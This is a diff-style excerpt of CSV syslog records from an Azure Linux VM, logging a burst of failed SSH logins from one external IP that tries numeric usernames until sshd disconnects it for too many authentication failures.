+2334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:11,UbuntuDevEnv,2019-06-28 05:12:10,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:14,UbuntuDevEnv,2019-06-28 05:12:13,auth,UbuntuDevEnv,info,Invalid user 0 from 193.201.224.232 port 52535,92401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0,193.201.224.2,52535,,
+2336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:14,UbuntuDevEnv,2019-06-28 05:12:13,auth,UbuntuDevEnv,info,Failed none for invalid user 0 from 193.201.224.232 port 52535 ssh2,92401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0,193.201.224.2,52535,,
+2337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:14,UbuntuDevEnv,2019-06-28 05:12:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:14,UbuntuDevEnv,2019-06-28 05:12:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:15,UbuntuDevEnv,2019-06-28 05:12:15,auth,UbuntuDevEnv,info,Failed password for invalid user 0 from 193.201.224.232 port 52535 ssh2,92401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0,193.201.224.2,52535,,
+2340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:16,UbuntuDevEnv,2019-06-28 05:12:15,auth,UbuntuDevEnv,info,"Disconnecting invalid user 0 193.201.224.232 port 52535: Change of username or service not allowed: (0,ssh-connection) -> (0000,ssh-connection) [preauth]",92401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0,193.201.224.2,52535,,
+2341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:17,UbuntuDevEnv,2019-06-28 05:12:17,auth,UbuntuDevEnv,info,Invalid user 0000 from 193.201.224.232 port 58725,92417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0000,193.201.224.2,58725,,
+2342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:17,UbuntuDevEnv,2019-06-28 05:12:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:17,UbuntuDevEnv,2019-06-28 05:12:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:20,UbuntuDevEnv,2019-06-28 05:12:19,auth,UbuntuDevEnv,info,Failed password for invalid user 0000 from 193.201.224.232 port 58725 ssh2,92417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0000,193.201.224.2,58725,,
+2345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:20,UbuntuDevEnv,2019-06-28 05:12:19,auth,UbuntuDevEnv,info,"Disconnecting invalid user 0000 193.201.224.232 port 58725: Change of username or service not allowed: (0000,ssh-connection) -> (1111,ssh-connection) [preauth]",92417,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,0000,193.201.224.2,58725,,
+2346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:21,UbuntuDevEnv,2019-06-28 05:12:20,auth,UbuntuDevEnv,info,Invalid user 1111 from 193.201.224.232 port 62129,92436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1111,193.201.224.2,62129,,
+2347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:21,UbuntuDevEnv,2019-06-28 05:12:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:21,UbuntuDevEnv,2019-06-28 05:12:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:22,UbuntuDevEnv,2019-06-28 05:12:22,auth,UbuntuDevEnv,info,Failed password for invalid user 1111 from 193.201.224.232 port 62129 ssh2,92436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1111,193.201.224.2,62129,,
+2350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:22,UbuntuDevEnv,2019-06-28 05:12:22,auth,UbuntuDevEnv,info,"Disconnecting invalid user 1111 193.201.224.232 port 62129: Change of username or service not allowed: (1111,ssh-connection) -> (123,ssh-connection) [preauth]",92436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1111,193.201.224.2,62129,,
+2351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:24,UbuntuDevEnv,2019-06-28 05:12:23,auth,UbuntuDevEnv,info,Invalid user 123 from 193.201.224.232 port 1306,92448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,193.201.224.2,1306,,
+2352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:24,UbuntuDevEnv,2019-06-28 05:12:23,auth,UbuntuDevEnv,info,Failed none for invalid user 123 from 193.201.224.232 port 1306 ssh2,92448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,193.201.224.2,1306,,
+2353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:26,UbuntuDevEnv,2019-06-28 05:12:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:26,UbuntuDevEnv,2019-06-28 05:12:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:28,UbuntuDevEnv,2019-06-28 05:12:27,auth,UbuntuDevEnv,info,Failed password for invalid user 123 from 193.201.224.232 port 1306 ssh2,92448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,193.201.224.2,1306,,
+2356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:28,UbuntuDevEnv,2019-06-28 05:12:27,auth,UbuntuDevEnv,info,"Disconnecting invalid user 123 193.201.224.232 port 1306: Change of username or service not allowed: (123,ssh-connection) -> (42424,ssh-connection) [preauth]",92448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,193.201.224.2,1306,,
+2357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:39,UbuntuDevEnv,2019-06-28 05:12:38,auth,UbuntuDevEnv,info,Invalid user 42424 from 193.201.224.232 port 32061,92483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,42424,193.201.224.2,32061,,
+2358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:39,UbuntuDevEnv,2019-06-28 05:12:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:39,UbuntuDevEnv,2019-06-28 05:12:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:41,UbuntuDevEnv,2019-06-28 05:12:40,auth,UbuntuDevEnv,info,Failed password for invalid user 42424 from 193.201.224.232 port 32061 ssh2,92483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,42424,193.201.224.2,32061,,
+2361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:41,UbuntuDevEnv,2019-06-28 05:12:40,auth,UbuntuDevEnv,info,"Disconnecting invalid user 42424 193.201.224.232 port 32061: Change of username or service not allowed: (42424,ssh-connection) -> (1502,ssh-connection) [preauth]",92483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,42424,193.201.224.2,32061,,
+2362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:41,UbuntuDevEnv,2019-06-28 05:12:41,auth,UbuntuDevEnv,info,Bad protocol version identification '' from 188.25.166.56 port 51724,92519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,51724,,
+2363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:45,UbuntuDevEnv,2019-06-28 05:12:45,auth,UbuntuDevEnv,info,Invalid user 1502 from 193.201.224.232 port 8443,92518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1502,193.201.224.2,8443,,
+2364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:45,UbuntuDevEnv,2019-06-28 05:12:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:45,UbuntuDevEnv,2019-06-28 05:12:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:47,UbuntuDevEnv,2019-06-28 05:12:47,auth,UbuntuDevEnv,info,Failed password for invalid user 1502 from 193.201.224.232 port 8443 ssh2,92518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1502,193.201.224.2,8443,,
+2367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:47,UbuntuDevEnv,2019-06-28 05:12:47,auth,UbuntuDevEnv,info,"Disconnecting invalid user 1502 193.201.224.232 port 8443: Change of username or service not allowed: (1502,ssh-connection) -> (22,ssh-connection) [preauth]",92518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1502,193.201.224.2,8443,,
+2368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:51,UbuntuDevEnv,2019-06-28 05:12:50,auth,UbuntuDevEnv,info,Invalid user 22 from 193.201.224.232 port 15369,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:51,UbuntuDevEnv,2019-06-28 05:12:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:51,UbuntuDevEnv,2019-06-28 05:12:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:53,UbuntuDevEnv,2019-06-28 05:12:52,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 15369 ssh2,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:53,UbuntuDevEnv,2019-06-28 05:12:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:55,UbuntuDevEnv,2019-06-28 05:12:55,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 15369 ssh2,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:56,UbuntuDevEnv,2019-06-28 05:12:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:58,UbuntuDevEnv,2019-06-28 05:12:57,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 15369 ssh2,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:00,UbuntuDevEnv,2019-06-28 05:12:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:02,UbuntuDevEnv,2019-06-28 05:13:01,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 15369 ssh2,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:02,UbuntuDevEnv,2019-06-28 05:13:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:03,UbuntuDevEnv,2019-06-28 05:13:03,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 15369 ssh2,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:05,UbuntuDevEnv,2019-06-28 05:13:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:08,UbuntuDevEnv,2019-06-28 05:13:07,auth,UbuntuDevEnv,info,Disconnecting invalid user 22 193.201.224.232 port 15369: Too many authentication failures [preauth],92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:08,UbuntuDevEnv,2019-06-28 05:13:07,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 15369 ssh2,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:08,UbuntuDevEnv,2019-06-28 05:13:07,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:08,UbuntuDevEnv,2019-06-28 05:13:07,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:08,UbuntuDevEnv,2019-06-28 05:13:07,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user 22 from 193.201.224.232 port 15369 ssh2 [preauth],92546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,15369,,
+2386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:09,UbuntuDevEnv,2019-06-28 05:13:08,auth,UbuntuDevEnv,info,Invalid user 22 from 193.201.224.232 port 60601,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,60601,,
+2387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:09,UbuntuDevEnv,2019-06-28 05:13:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:09,UbuntuDevEnv,2019-06-28 05:13:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:10,UbuntuDevEnv,2019-06-28 05:13:10,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 60601 ssh2,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,60601,,
+2390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:12,UbuntuDevEnv,2019-06-28 05:13:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:13,UbuntuDevEnv,2019-06-28 05:13:13,auth,UbuntuDevEnv,info,Failed password for invalid user 22 from 193.201.224.232 port 60601 ssh2,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,22,193.201.224.2,60601,,
+2392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:13:14,UbuntuDevEnv,2019-06-28 05:13:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
